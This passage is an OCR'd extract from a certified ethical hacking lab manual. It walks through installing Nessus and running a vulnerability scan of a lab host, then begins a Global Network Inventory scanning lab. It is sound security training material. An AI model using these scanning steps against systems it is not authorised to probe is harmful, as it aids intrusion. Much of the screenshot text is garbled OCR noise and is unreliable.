If you want to review or change any of your installation settings, dfck Back. Ckk Cancel to exit the wizard.
InstalShield
CancelInstal< Back
Nessus probes network services on each host to obtain banners that contain software and OS version information
FIGURE 10.6: Nessus InstallShield Wizard
10 . O n c e in s ta l l a t io n is c o m p l e te , c l ic k Finish.
Tenable Nessus (x64) ־ InstallShield Wizard
InstalShield Wizard Completed
The InstalShield Wizard has successfuly nstaled Tenable Nessus (x64). Ckk Finish to exit the wizard.
Cancel
Q Path of Nessus home directory for windows \programfiles\tanable\nessus
FIGURE 10.7: Nessus Install Shield wizard
Nessus Major Directories
■ T l i e m a jo r d i r e c to r i e s o f N e s s u s a r e s h o w n i n t h e f o l lo w in g ta b le .
Ethical Hacking and Countermeasures Copyright O by EC־Counc11All Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 173
M odule 03 - S can n in g N e tw o rk s
Nessus Home Directory Nessus Sub-Directories Purpose
1 Windows
\ProgramFiles\Tenable\Nessus
\conf Configuration files\data Stylesheet templates\nessus\plugins Nessus plugins
\nassus\us«rs\<username>\lcbs User knowledgebase saved on disk
>-------------------------------- -\no33us\logs
1 --------------------1, Nessus log files
TABLE 10.1: Nessus Major Directories
11 . A f t e r in s ta l la t io n N e s s u s o p e n s i n y o u r d e f a u l t b r o w s e r .
12 . T h e Welcome to Nessus s c r e e n a p p e a r s , c l ic k d ie here l i n k t o c o n n e c t
v ia SSL
w elcom e to Nessus!PIm m c o n n e c t v ia SSL b y c lick in cJ h » r « .
You are hkely to get a security alert from your web browser saying that the SSL certificate is invalid. You may either choose to temporarily accept the risk, or can obtain a valid SSL certificate from a registrar. Please refer to the Nessus documentation for more information.
FIGURE 10.8: Nessus SSL certification
13 . C lic k OK i n th e Security Alert p o p - u p , i f i t a p p e a r s
Security Alert
J j You are about to view pages over a secure connection.
Any information you exchange with this site cannot be viewed by anyone else on the web.
In the future, do not show this warning
ע
More InfoOK
FIGURE 10.9: Internet Explorer Security Alert
14. C l ic k th e Continue to this website (not recommended) l in k to
c o n t i n u e
feUI During the installation and daily operation of Nessus, manipulating the Nessus service is generally not required
— The Nessus Server Manager used in Nessus 4 has been deprecated
Ethical Hacking and Countermeasures Copyright O by EC־Counc11All Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 174
M odule 03 - S can n in g N e tw o rk s
1& * ^ II Ccrtficate Error: Mavigation... '
X Snagit g j £ t
There is a problem with this website's security certificate.
The security certificate presented by this website was not issued by a trusted certificate authority.The security certificate presented by this websrte was issued for a different website s address.
Sccunty certificate problems m ay indicate an ottempt to fool you o r intercept any data you send to the server.
Wc recommend that you close this webpage and do not continue to this website.d Click here to close this webpage.
0 Continue to this website (not recommended).
More information
FIGURE 10.10: Internet Explorer website’s security certificate
15. o n OK in t h e Security Alert p o p - u p , i f i t a p p e a r s .
Security Alert
1C. i ) You are about to view pages over a secure connection
Any information you exchange with this site cannot be viewed by anyone else on the web.
H I In the future, do not show this warning
1
t r
More InfoOK
FIGURE 10.11: Internet Explorer Security Alert
16 . T h e Thank you for installing Nessus s c r e e n a p p e a r s . C l ic k t h e Get Started > b u t t o n .
R ff
£Q! Due to die technical implementation of SSL certificates, it is not possible to ship a certificate with Nessus that would be trusted to browsers
• >>< h * H i N m iii •v* tflknv y!>u l<1 portoim
Welcome to N essus ׳TW ik you foi liintrtllli •j tin• wuM 1
1 I *ah 3pe«d vukierntilNty diSEOvery. to detem\r* *tven hcets are rumlna wttich se1v1r.es 1 A1j«nlU1a1 mtrlili mj, la 1m U wt« no Im l )■ » ia •acurlly |W ■ I w.> L-umplianca chocks, to verify and prove that « vv , host on your network adheres to tho security pokey you 1 Scan sehwliJnm, to automatically rui *cant at the freijwncy you יAnd morel ׳
!!•< stofted *
FIGURE 10.11: Nessus Getting Started
17 . 111 Initial Account Setup e n te r th e c r e d e n t ia l s g iv e n a t th e t im e o f r e g i s t r a t i o n a n d c l ic k Next >
m warning, a custom certificate to your organization must be used
Ethical Hacking and Countermeasures Copyright O by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 175
M odule 03 - S can n in g N e tw o rk s
Wefconeu Neausp • o («*•*<״.«*״>. e c
In itia l Account SetupFirst, we need to create an admin user for the scanner. This user will have administrative control on the scanner; the admin has the ability to create/deiete users, stop ongoing scans, and change the scanner configuration.
loo*n: admin
Confirm P«*Mword:< Prev | Next > |
Because f/* admin user can change the scanner configuration, the admin has (he ability to execute commands on the remote host. Therefore, It should bei that the admin user has the same privileges as the *root ״ (or administrator) user on the remote ho:
FIGURE 10.12: Nessus Initial Account Setup
1 8 . 111 Plugin Feed Registration, y o u n e e d t o e n t e r d i e a c t i v a t i o n c o d e . T o
o b t a i n a c t i v a t i o n c o d e , c l ic k t h e http://www.nessus.org/register/ lin k .
19. C lic k th e Using Nessus at Home i c o n in Obtain an Activation Code
mi (A *CAftCM in ז
<9> T EN A BLE Network Security*I n Certift&ttH)!! Resource* Supicot
Obtain an Activation CodeUsing Nesaus at Work? Using Nessus at Home? A A Ham■( ■ml »m>*Cripr«l Iswuk1uV4cM * fu< ail Dm jn l tot h tm Mia ootj
in
if'tMhk■ ProdiKls
Protfua Ovenfe* Nk su i AudHai
.1 n lu**Plug ׳Ml'!׳•••
.Sjirplr Report!
N«MUi FAQ Vk«le D»14CM FAQ Dtptovmam 1>:001uMowus Evukoiion
T raining
> ■ el
m If you are using Hie Tenable SecurityCenter, the Activation Code and plugin updates are managed from SecurityCenter. Nessus needs to be started to be able to communicate with SecurityCenter, which it wfll normally not do without a valid Activation Code and plugins
FIGURE 10.13: Nessus Obtaining Activation Code
2 0 . 111 Nessus for Home a c c e p t t h e a g r e e m e n t b y c l ic k in g th e Agree b u t t o n
a s s h o w n i n t h e f o l lo w in g f ig u re .
Ethical Hacking and Countermeasures Copyright O by EC־Counc11All Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 176
M odule 03 - S can n in g N e tw o rk s
■ Mom fc< Mama |t«nat1l«Wckcme 10 Mawtow*« m ss
t *vtl ProtoiaiOAilFaed iubbcflbaf* enjty You mat •ot uu 1. The Netare rtoaaafocd
do*1 *c* gn* you io :w to of 1K0v> yov to perform <dedR 0( *S* Tw Nes*u» llrtual
1 Nmhh HomFnd Mibscilpllon it a■ alatile lot ptnoia) mm י• a I ( o• tf. * Is ink lot use by any commercial otqam/atn■ t !on 1q «t!
c*«»*| or vw *Inm * iiw M ni tr.iinrvjTrtontoa Ptoarjm tor 0<>1r(; ■ttionf.
ז » aroajJ •#! 1k* M m ii HowFbwJ Mtncri|40n lot lo » 1 «m | fc w cfe* ‘ 7 to ’••׳k u « i *to turn• 01 •M 4ml bwjln iho <Jc׳#nlMd prooaat•
SU8VCWII0M ACM I Ml NI
Product Ovenv*FaaiuraaNossue Buwwct Noasus ter Homa W*y to New#* ‘t־’ Nesius V « 1l f A!(n
N W III PluflM
»׳״• *Suy^otW w m nlr*j SyvtMn otw״Ini 01 Ope •יי• IVrjalAQor rtaouis fA<J lound cti arr, lenaUa mvCcI
Mbwaowi) moa>«»« 1■ to•1 •vaeelto ncto«n| n nu n M o iy
K» •• Ratoawonarf-aod S«4xc>|pt«n You agiaa 10 r«v * «*•<> «<«* to• to Tt^aUa to• •ach ayatoan on which You have inttaltod a Prjntr'Kl Scama•T׳ »«<pj Ojaniriton MiVAPthntandiuj 1N» pit ifcrtcn ow cotnwcM »a* m S*C»m 2141.1 Vau ara * *atimj 01!>trifi10n You m*» copy MM iwget *4 •MMMaM T tN tV t »IM«M Md Tm1U» HonMF«*d s<Mot*«M rwgto to — <1rt> to »1*d to« *♦ ew׳w00׳tn teeing onV Upon eompte oti ot #* d m t*»
rigM to *a lt>« Pkj£n& ptmUtod by to* HomaFaad SubfeuipCan is
S41v(Ju Rapotto N m ai fAQ M<«I6 Dtotc** FAQ Deployment Options
Ptc/w*‘. ;■wFwd SK.t־vjlp־i:»1 («. *(fleab*e n *•־,ox !tent# •*> toe Suts<־i * *0 »! c«aa(an r«ftj (of 4nd pay 81)״ » associated <■׳ P TmiSu&ttrfpaa• You awv not u&a tw H>r׳* f sad Subscripted 91 anted to You lot * inj■!־ pu>p0M± to aacuf• Y«u> 01 any third party's, laatwoifcs or to any etoa■
tw cl«M«o« taning h * rorvpioductrxi «nv»or1׳r>*r1• T eaM amtofanuci a fr«* Sut«rp#on undat this Suction 21c | al t coti C is t* Metsus Ftogm Deralopment and 1 « & ״ JM ■am at lha Subbcitpttaoa 10 wtto and dovobp 1
apmant and DiMnbttoan tenable I
FIGURE 10.14: Nessus Subscription Agreement
F il l in th e Register a HomeFeed s e c t io n t o o b t a i n a n a c t iv a t io n c o d e
a n d c l ic k Register.21
GO!ENTER SEARCH TEXT
* TENABLE Network SecurityPartner* 1raining li fortification Resources Si port
> paint |
Register a HomeFeed1 «#h 4 vjfed>1 1 U nil! not I
T 0 May up todato with 11m* Nut.uit. pljgint you nwtl tt>■; etrnU iMlilte-11 to utilch an activation code wll be *ert Ye th a r td with any 3rd patty.ס
am» * con• ־■
□ Check lo receive updates from Tenable
| Hpql ter |
!enable ProductsProduct Ov m v Iow
No s m s Auditor OuniSes
N«84u« Ptu^lns
Documentation
Sample Repoita
N*5»u9 FAQ
Motde Devices FAQ
Deployment Options
Nes3u3 Evaluation
Training
FIGURE 10.15: Nessus Registering HomeFeed
2 2 . T h e Thank You for Registering w in d o w a p p e a l s f o r Tenable Nessus HomeFeed.
S l f you do not register your copy of Nessus, you will not receive any new plugins and will be unable to start the Nessus server. Note: The Activation Code is not case sensitive.
Ethical Hacking and Countermeasures Copyright C by EC־Counc11All Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 177
M odule 03 - S can n in g N e tw o rk s
217After the initial registration, Nessus will download and compile the plugins obtained from port 443 of plugins.nessus.or gplugins-customers.nessus.org
2 4 . N o w e n te r th e a c t i v a t io n c o d e r e c e iv e d t o y o u r e m a i l I D a n d c l ic k Next.
V י j . *>■ « Y«.to׳ .
ENTER SEARCH IE■(
TENABLE Network Security1Solutions Products Services Partners iraimna & certification Resources Support At out !enable Store
> print | » sltare Q
Tenable Charitable & !raining Organization Program
T enable N c tin il Security offers Nessus rot•• won•( •*4 •uMcnpcon• •t no׳l
cod to ct1*ftut4• oroartaation• I
Tenable Products
Thank You for Registering!nessusThank jrou tor reghlMlag your I eon bit׳ Nt-viun HomeFeed An emal conraMng w a activation 604• hA* just boon Mint to you •l tie email Kktm you pravWed
Please note *at tie !enable Nessus HomeFeed h uvislUiMt- for home um oo»r If you want to use Nasaus at your place of business, you nuat ouicnase the Nessus Proleaaowageed Akemaiet. you nay purchase a subscription to the Nessus PofimoHM Sarnica and scan in tM cioudl Tha N attu i Ponawlci Service does no( require any software download.
For more mtetraabon on tw HomsFeed. Professional eed and Nessus Perimeter Sec.ice. please visit our Discussions Forum.
Product Overview
Nessus Auditor Bundles
Nessus Plugins
Documentation
Sample Reports
Nessus FAQ
Mobile Devices FAQ
Deployment Options
S m u t Evaluation
I raining
FIGURE 10.16: Nessus Registration Completed
2 3 . N o w lo g in t o y o u r e m a i l f o r t h e a c t i v a t io n c o d e p r o v i d e d a t t h e t im e o f
r e g i s t r a t i o n a s s h o w n i n t h e f o l lo w in g f ig u re .
<d • uflKfccjrX _ uSmqSma yaH00.C0׳n' •P
| - Sm>Cu1 Omu >
Y a h o o ! m a i l
MIMDttalt
<1• %) «w* •י* tie l*le41 ■lupnt lw
1b4e Homefeeo Activation CoO*NMtut K י ig L iio i •
10 aw׳■ . ■ounoooor*
th«r* )Oulw rtanlairtj row N n w i m » w 1 *w Th* W««U» Hamafaad gubKiCton will >*er |M» Netfulsully gcannng
»you usa rusius n ג professorial 09301 10u a ftcftsslcruiFoaa suBcagimi
ms •r, 3 onMme 0» n׳cu ir-n‘1-4 *aorta \-״־ is >0u •11t1wo»repsK<trasc3rr>»ri1(».f1if10t.׳‘ ו**• :
C ««usng 1nt srcceSires Stlpw.
I cnm ««!• STOCMt
>* 1 • «Mat pUJ-<n• יזו
■w * . ,Twwjuaiiu.'Ui'ntrHntantMuyMHiiimuum " ״ יי *** •
t— «** ״e»a *a Me• in anamit* p ״״»«.»* y> p* tia uw. ana c*>»*
M tx caaa toittiaiaftBfl
PtaawconWt If!• Nmmii i n*tt11»wn ^•9»
Ne inttmal Aixeii «״ i w Mnaui *׳* « - ׳'M>t« tl'MU• inttiiiilnr camoi׳• a t * 1 •׳You an And ottna ic-jlsti 1t»jr m ilv a n at
FIGURE 10.17: Nessus Registration mail
Ethical Hacking and Countermeasures Copyright O by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 178
M odule 03 - S can n in g N e tw o rk s
9 Wekcm* 10 Meuvt ®[ן, - " • F״P lu g in F e e d R e g is t r a t io n
As• information about new vulnerabilities 18 discovered and released into the public domain, Tenabte's research staff designs programs ("plugins”) that enable Nessus to detect their presence. The plugins contain vulnerability Information, the algorithm to test for the presence of the security Issue, and a set of remediation actions. To use Nessus, you need to subscribe to a "Plugin Feed*. You can do so by voting http 7/www.nessus.orQyreolster/ to obtain an Activation Code.
• To use Nessus at your workplace, pufdiaae a com met Gd Prgfcaatonalf ccd• To um NcMuti at In a non ■commercial homo environment, you can get 11 HomeFeed (or free• Tenable SecurltvCentor usore: Enter 'SoairltyCenter* In the field below• To perform offline plugin updates, enter 'offline' In the field below
Activation Code
Please enter your Activation Code:|9061-0266-9046-S6E4-l8£4| x |
Optional Proxy Settings
< Prev Next >
IbsdJ Once the plugins liave been downloaded and compiled, the Nessus GUI will initialize and the Nessus server will start
FIGURE 10.18: Nessus Applying Activation Code
2 5 . T h e Registering w in d o w a p p e a r s a s s h o w n i n d i e f o l lo w in g s c r e e n s h o t .
C * *-ho* P • 0 Cc**uttemH SC J wefc <•*׳< to m ft * ofx Bs~** ■ d 1
R e g is t e r in g .. .
Registering the scanner with Tenable...
FIGURE 10.19: Nessus Registering Activation Code
2 6 . A f t e r s u c c e s s f u l r e g i s t r a t i o n c lic k , Next: Download plugins > to
d o w n lo a d N e s s u s p lu g in s .
* י ־ י -׳P • O Ce*rt<*e««o« & C| Wetcone to Nessus ■ ־ ־ ft * o
x a]ן =f
R e g is t e r in g .. .
Successfully registered the scanner with Tenable.Successfully created the user.
| Next: Download plug!mi > |
m Nessus server configuration is managed via the GUI Tlie nessusdeonf file is deprecated In addition, prosy settings, subscription feed registration, and offline updates are managed via the GUI
FIGURE 10.20: Nessus Downloading Plugins
2 7 . N e s s u s w ill s t a r t f e t c h in g th e p lu g in s a n d i t w ill in s ta l l t h e m , i t w ill ta k e t im e t o in s ta l l p lu g in s a n d in i t i a l i z a t i o n
N e s s u s is f e t c h in g t h e n e w e s t p lu g in s e t
Pleaae wait...
FIGURE 10.21: Nessus fetching the newest plugin set
2 8 . H i e Nessus Log In p a g e a p p e a r s . E n t e r t h e Username a n d Password g iv e n a t th e t im e o f r e g i s t r a t i o n a n d c l ic k Log In.
Ethical Hacking and Countermeasures Copyright O by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 179
M odule 03 - S can n in g N e tw o rk s
/>. 0 tc
nessus
L i
I «•«״
TENA»Lg ׳
FIGURE 10.22: The Nessus Log In screen
2 9 . T h e Nessus HomeFeed w in d o w a p p e a r s . C lic k OK.
• T A S K 2
Network Scan Vulnerabilities
Q For the item SSH user name, enter the name of the account that is dedicated to Nessus on each of the scan target systems.
,1 / / / 1 nessus
inn rm m iv a u u r a h m kMMWuNMy i M W M u w
J m i u h (eepenew.
M to llm idTBtHil lr» nanatamO » M M tomay load 10 (*iMoaAon
w l oaiiUtanter any oust fton* oroigMtaAofii M• to a PTOtoMknalFMd Subecrtpfcxi ha<•
190* - ?0121)nM1 N M M s*.o r*/ nc OK I
FIGURE 10.23: Nessus HomeFeed subscription
3 0 . A f t e r y o u s u c c e s s f u l ly lo g in , th e Nessus Daemon w in d o w a p p e a r s a s s h o w n i n th e f o l lo w in g s c r e e n s h o t .
FIGURE 10.24: The Nessus main screen
3 1 . I f y o u h a v e a n Administrator Role, y o u c a n s e e d i e Users ta b , w h ic h
li s ts a ll Users, th e i r Roles, a n d th e i r Last Logins.
m To add a new policy, dick Policies ־־ Add Policy.
Ethical Hacking and Countermeasures Copyright O by EC־Counc11All Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 180
M odule 03 - S can n in g N e tw o rk s
New policies are configured using tlie Credentials tab.
FIGURE 10.25: The Nessus administrator view
3 2 . T o a d d a n e w p o lic y , c l ic k Policies ־> Add Policy. F il l i n th e General p o l ic y s e c t io n s , n a m e ly , Basic, Scan, Network Congestion, Port Scanners, Port Scan Options, a n d Performance.
^WARNING: Any changes to the Nessus scanner configuration will affect ALL Nessus users. Edit these options carefully
FIGURE 10.26: Adding Policies
3 3 . T o c o n f ig u r e d i e c r e d e n t ia l s o f n e w p o l ic y , c l ic k d i e Credentials t a b
s h o w n i n t h e l e f t p a n e o f Add Policy.
Ethical Hacking and Countermeasures Copyright O by EC־Counc11All Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 181
M odule 03 - S can n in g N e tw o rk s
m The most effective credentials scans are those for which the supplied credentials have root privileges.
FIGURE 10.27: Adding Policies and setting Credentials
3 4 . T o s e le c t th e r e q u i r e d p lu g in s , c l ic k th e Plugins t a b i n t h e l e f t p a n e o f Add Policy.
«׳ ״ P• . ״
W OWBlc/Otr!«c» U rir 18W8 eo?1Ax aunt 0+m *י*7
OCUkttO'ta •• -J’UrKlnl IoiiiiiIii«>>uII.<W• ..יינייי ין וי O
^ r» u«!j Suit# 1« o!v.b Oan ottKdfenwct,
(a) 0«neralVj GenlTOUKBlS*aj׳*yChK*»y mp-ux L0Ca Seaifty c׳k»i
Jurat UjcU Sacunty ChKM
O A««r«l fc**״ ftM■*2m* L*»r> *> IknU. o or Par 20 AO. Weilmiin ftwaia־BaiHir r>KM1 Su עטי 1
O 16TO CCHO P1W) 01 Melon O 14M0 C* 1tar« KTTP Pra! Si f * ! Hcd Hattr Rurola DoS <J 120M Ctcd Pow F.irVVal 4■ , .ו 1 uae VjInentollB |0f. FS|
3wopn» Trie *matt tc*
f*»1 Cik re TCP poll *22 1 WO. ז75יי***ד ffj»wy UelyBialKW5 isAOioai*scrtr sc*<**nce pars TCP.E221 מ<׳«!יא1 ני W v*׳.v.e־CT. 17* MtiKtAwklinsj׳ TCP.'1781 4ייי*ו.־*יז)tcfirttxn Uxlumg
m If you are using Kerberos, you must configure a Nessus scanner to authenticate a KDC.
FIGURE 10.28: Adding Policies and selecting Plugins
3 5 . T o c o n f ig u r e p r e f e r e n c e s , c l ic k th e Preferences t a b i n t h e l e f t p a n e o f
Add Policy.
3 6 . I n t h e Plugin f ie ld , s e le c t Database settings f r o m t h e d r o p - d o w n lis t.a If the policy issuccessfully added, then the 3 7 . E n t e r th e Login d e ta i ls g iv e n a t d i e t im e o f r e g i s t r a t io n .Nessus server displays themassage 3 8 . G iv e t h e D a ta b a s e S I D : 4587, D a ta b a s e p o r t t o u s e : 124, a n d s e le c t
O r a c le a u t l i ty p e : SYSDBA.
3 9 . C lic k Submit.
Ethical Hacking and Countermeasures Copyright O by EC־Counc11All Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 182
FIGURE 10.29: Adding Policies and setting Preferences
4 0 . A m e s s a g e Policy “ NetworkScan_Policy״ was successfully addedd is p la y s a s s h o w n a s fo l lo w s .
FIGURE 10.30: The NetworkScan Policy
4 1 . N o w , c l ic k Scans ־> Add t o o p e n th e Add Scan w in d o w .
4 2 . I n p u t t h e f ie ld Name, Type, Policy, a n d Scan Target
4 3 . 111 Scan Targets, e n t e r d i e I P a d d r e s s o f y o u r n e tw o r k ; h e r e in th i s la b
w e a r e s c a n n in g 1 0 .0 .0 .2 .
4 4 . C lic k Launch Scan a t d i e b o t t o m - r i g h t o f t h e w in d o w .
Note: T h e I P a d d r e s s e s m a y d i f f e r i n y o u r la b e n v i r o n m e n t
CD Tools demonstrated in this lab are available in D:\CEH- Tools\CEHv8 Module 03 Scanning Networks
To scan the window, input the field name, type, policy, scan target, and target file. ‘
Ethical Hacking and Countermeasures Copyright O by EC־Counc11CEH Lab Manual Page 183
M odule 03 - S can n in g N e tw o rk s
Nessus lias the ability to save configured scan policies, network targets, and reports as a .nessus file.
FIGURE 10.31: Add Scan
4 5 . T h e s c a n la u n c h e s a n d starts scanning t h e n e tw o r k .
FIGURE 10.32: Scanning in progress
4 6 . A f t e r th e s c a n is c o m p l e te , c l ic k t h e Reports ta b .
FIGURE 10.33: Nessus Reports tab
4 7 . D o u b le - c l i c k Local Network to v ie w th e d e ta i le d s c a n r e p o r t .
^ gMtyifc ■ d • —*-..י
S ' Tools demonstrated in this lab are available in D:\CEH• Tools\CEHv8 Module 03 Scanning Networks
Bn■ B < Cvwii ' So-Mity ״ »— ״׳•*־׳Hm n t ■w 11 ■1 I K INW I • M m
m tn
Zנ־י■׳•
] £ >•> ז*ו l«v>H MH MtMM
H9W•xfn H lrrt>
1-01 Iftte U B•MO. Infe
MeMUl-a* •*«-—■».»» * «Qi C«uM Urm tlmb«n rf UTMMB1 W . i■■— 1 •MM•
KTT* Im i T>»• M VIWMH W tN « M < N i l r a W U I IM t W M « l W M W lK M l
M.»~« •Tnl *m NHHl^«ll>H|«i iW .I» UhmlUn C M ** •McmcC o 1 o -*« it f i LMdicr ntar njlutPu < » Fun tut SID Ewneutan WiMom M m x M tC o t n m k U u iu im wmm uv* no^jMren L׳i 1»«-cruttn U n » hgr r J• OaHK Qn-a• U r . riCK) SnaUU- C «M
FIGURE 10.34: Report of the scanned target
Ethical Hacking and Countermeasures Copyright O by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 184
M odule 03 - S can n in g N e tw o rk s
4 8 . D o u b le - c l i c k a n y result t o d is p la y a m o r e d e ta i le d s y n o p s is , d e s c r ip t i o n ,
s e c u r i ty le v e l , a n d s o lu t io n .
FIGURE 10.35: Report of a scanned target
4 9 . C l ic k t h e Download Report b u t t o n i n t h e l e f t p a n e .
5 0 . Y o u c a n d o w n lo a d a v a i la b le r e p o r t s w i th a .nessus e x te n s io n f r o m th e d r o p - d o w n lis t.
Download Report X
Download Format 1
Chapters
Q If you are manually creating "nessusrc" files, there are several parameters that can be configured to specify SSH authentications.
Chapter Selection Not Allowed
Cancel Submit
FIGURE 10.36: Download Report with .nessus extension
5 1 . N o w , c l ic k Log out.
5 2 . 111 th e N e s s u s S e r v e r M a n a g e r , c l ic k Stop Nessus Server.
P ■ * 6B M a <■׳־׳
■69■FIGURE 10.37: Log out Nessus
L a b A n a ly s is
D o c u m e n t all d ie re s u lts a n d r e p o r t s g a d ie r e d d u r in g d ie lab .
G 3 To stop Nessus server, go to the Nessus Server Manager and click Stop Nessus Server button.
Ethical Hacking and Countermeasures Copyright O by EC־Counc11All Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 185
M odule 03 - S can n in g N e tw o rk s
T o o l / U t i l i t y I n f o r m a t i o n C o l l e c t e d / O b j e c t i v e s A c h i e v e d
Nessus
S c a n T a r g e t M a c h i n e : L o c a l H o s t
Perform ed Scan Po licy: N e t w o r k S c a n P o l ic y
Target I P Address: 1 0 .0 .0 .2
Result: L o c a l H o s t v u ln e r a b i l i t ie s
P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N SR E L A T E D T O T H I S L A B .
Q u e s t io n s
1. E v a lu a t e th e O S p l a t f o r m s t h a t N e s s u s h a s b u i ld s fo r . E v a lu a t e w h e t h e r
N e s s u s w o r k s w i t h t h e s e c u r i ty c e n te r .
2 . D e t e r m i n e h o w th e N e s s u s l i c e n s e w o r k s in a V M (V ir tu a l M a c h in e )
e n v i r o n m e n t .
I n t e r n e t C o n n e c t i o n R e q u i r e d
es0 \
Platform Supported
0 Classroom
□ N o
□ iL a b s
CEH Lab Manual Page 186 Ethical Hacking and Countermeasures Copyright O by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited.
M odule 03 - S can n in g N e tw o rk s
Auditing Scanning by using Global Network InventoryGlobal]Seh) •ork Inventory is used as an audit scanner in ~ero deployment and agent-free environments. It scans conrp!iters by IP range, domain, con/p!iters or single computers, defined by the Global Netirork Inventory host file.L a b S c e n a r io
W i t h t h e d e v e l o p m e n t o f n e t w o r k t e c h n o lo g ie s a n d a p p l i c a t i o n s , n e t w o r k a t t a c k s a r e g r e a t ly i n c r e a s in g b o t h i n n u m b e r a n d s e v e r i ty . A t ta c k e r s a lw a y s l o o k
f o r service v u ln e r a b i l i t ie s a n d application v u ln e r a b i l i t ie s o n a n e tw o r k 0 1
s e r v e r s . I f a n a t t a c k e r f in d s a f la w o r l o o p h o l e in a s e r v ic e r u n o v e r th e I n t e r n e t ,
t h e a t t a c k e r w ill im m e d ia te ly u s e t h a t t o c o m p r o m i s e t h e e n t i r e s y s te m a n d
o t h e r d a ta f o u n d , th u s h e o r s h e c a n c o m p r o m i s e o t h e r s y s te m s 0 1 1 t h e n e tw o r k . S im ila r ly , i f th e a t t a c k e r f in d s a w o r k s t a t i o n w i t h administrative privileges w i th f a u l ts i n t h a t w o r k s t a t i o n ’s a p p l i c a t i o n s , th e y c a n e x e c u te a n
a r b i t r a r y c o d e 0 1 i m p la n t v i r u s e s t o i n t e n s i f y t h e d a m a g e t o th e n e tw o r k .
A s a k e y t e c h n i q u e i n n e tw o r k s e c u r i ty d o m a i n , i n t r u s i o n d e t e c t i o n s y s te m s
( I D S e s ) p la y a v i ta l r o le o f d e te c t in g v a r io u s k in d s o f a t t a c k s a n d s e c u r e th e
n e tw o r k s . S o , a s a n a d m i n i s t r a t o r y o u s h o u l d m a k e s u r e t h a t s e r v ic e s d o n o t r u n
a s t h e root user, a n d s h o u l d b e c a u t io u s o f p a t c h e s a n d u p d a te s f o r a p p l i c a t i o n s
f r o m v e n d o r s 0 1 s e c u r i ty o r g a n i z a t i o n s s u c h a s CERT a n d CVE. S a f e g u a r d s c a n
b e i m p le m e n te d s o t h a t e m a i l c l i e n t s o f tw a r e d o e s n o t a u to m a t i c a l l y o p e n o r
e x e c u te a t t a c h m e n t s . 1 1 1 t h i s la b , y o u w ill l e a r n h o w n e tw o r k s a r e s c a n n e d u s in g
th e G lo b a l N e t w o r k I n v e n t o r y to o l .
L a b O b je c t iv e s
T h is l a b w ill s h o w y o u h o w n e tw o r k s c a n b e s c a n n e d a n d h o w t o u s e G lo b a l
N e t w o r k I n v e n t o r y . I t w ill t e a c h v o u h o w to :
ICON KEYa- Valuable
information
s Test yourknowledge
Web exercise
m Workbook review
U s e th e G lo b a l N e t w o r k I n v e n t o r y t o o l
Ethical Hacking and Countermeasures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited.
CEH Lab Manual Page 187
M odule 03 - S can n in g N e tw o rk s
L a b E n v ir o n m e n t
T o c a n y o u t d i e l a b , y o u n e e d :
■ G lo b a l N e tw o r k I n v e n to r y to o l lo c a te d a t D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Scanning Tools\Global Network Inventory Scanner
■ Y o u c a n a ls o d o w n lo a d th e l a t e s t v e r s io n o f G lo b a l N e t w o r k I n v e n t o r y
f r o m th is l in k
h t t p : / / w w w .m a g n e t o s o f t . c o m / p r o d u c t s / g l o b a l n e t w o r k i n v e n t o r y / g ni f e a t u r e s . h t m /
■ I f y o u d e c id e t o d o w n lo a d th e l a t e s t v e r s io n , t h e n screenshots s h o w n
in t h e la b m i g h t d i f f e r
■ A c o m p u te r r u n n in g Windows Server 2012 a s a t ta c k e r (h o s t m a c h in e )
■ A n o th e r c o m p u te r r u n n in g Window Server 2008 a s v ic t im (v irtu a l
m a c h in e )
■ A w e b b r o w s e r w i th I n t e r n e t a c c e ss
■ F o l lo w d ie w iz a rd - d r iv e n in s ta l la t io n s te p s t o in s ta l l Global Network Inventory
■ A d m in is t r a t iv e p r iv ile g e s t o r u n to o ls
L a b D u r a t io n
T im e : 2 0 M in u te s
O v e r v ie w o f G lo b a l N e t w o r k In v e n t o r y
G lo b a l N e tw o r k I n v e n t o r y is o n e o f d ie de facto to o ls fo r security auditing a n d
testing o f firew a lls a n d n e tw o rk s , i t is a ls o u s e d to e x p lo i t Idle Scanning.
L a b T a s k s
1. L a u n c h th e Start m e n u b y h o v e r i n g d ie m o u s e c u r s o r i n t h e lo w e r - le f t
c o r n e r o f d i e d e s k to p .
FIGURE 11.1: Windows Server 2012 - Desktop view
2. C lic k d ie Global Network Inventory a p p to o p e n d ie Global Network Inventory w in d o w .
ZZל Tools demonstrated in this lab are available in D:\CEH- Tools\CEHv8 Module 03 Scanning Networks
t a s k 1
Scanning the network
Ethical Hacking and Countermeasures Copyright O by EC־CoundlAll Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 188
M odule 03 - S can n in g N e tw o rk s
5 t 9 Administrator £־׳|
ServerManager
WindowsPcrwerShell
GoogleChrome
Hn>er.VManager
fL m * וי
*J
ControlPanel
■F
Hypr-VWtualMachine.
SQLServs
*£
Mww&plcm
CommandPrompt
BMozfla£11*10*
S- BuiSearch 01.. Global
Nec»ort
PutBap © H
Scan computers by IP range, by domain, single computers, or computers, defined by the Global Network Inventory host file
FIGURE 112: Windows Server 2012 - Apps
3 . T l ie Global Network Inventory M a in w in d o w a p p e a r s a s s h o w n in d ie
fo l lo w in g fig u re .
4 . T h e Tip of Day w in d o w a ls o a p p e a rs ; c lic k Close.
& S c a n only items that you need by customizing scan elements
5. T u r n 0 1 1 Windows Server 2008 v ir tu a l m a c h in e f r o m H v p e r - V M a n a g e r .
